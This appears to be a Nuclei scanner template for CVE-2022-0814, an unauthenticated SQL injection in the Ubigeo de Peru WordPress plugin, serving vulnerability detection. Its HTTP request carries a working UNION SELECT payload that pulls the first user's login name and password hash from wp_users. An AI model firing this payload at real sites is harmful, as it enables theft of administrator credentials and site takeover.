id: CVE-2022-0814 info: name: Ubigeo de Peru < 3.6.4 - SQL Injection author: r3Y3r53 severity: critical description: | The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections. remediation: Fixed in version 3.6.4 reference: - https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814 - https://wordpress.org/plugins/ubigeo-peru/ - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0814 cwe-id: CWE-89 epss-score: 0.03633 epss-percentile: 0.91467 cpe: cpe:2.3:a:ubigeo_de_peru_para_woocommerce_project:ubigeo_de_peru_para_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: ubigeo_de_peru_para_woocommerce_project product: ubigeo_de_peru_para_woocommerce framework: wordpress publicwww-query: "/wp-content/plugins/ubigeo-peru/" tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth,ubigeo_de_peru_para_woocommerce_project http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users# matchers-condition: and matchers: - type: word part: body words: - 'idProv' - 'idDist' - 'distrito' condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a004830460221009d0af829a2026e1cbcd7a5b53b3113160e4aa16d2d3f2783e0c08139ae359b11022100fe9df65b9b640062afc5b0aad1fd9ba391be5046758f6b0eda26ff19ed069318:922c64590222798bb761d5b6d8e72950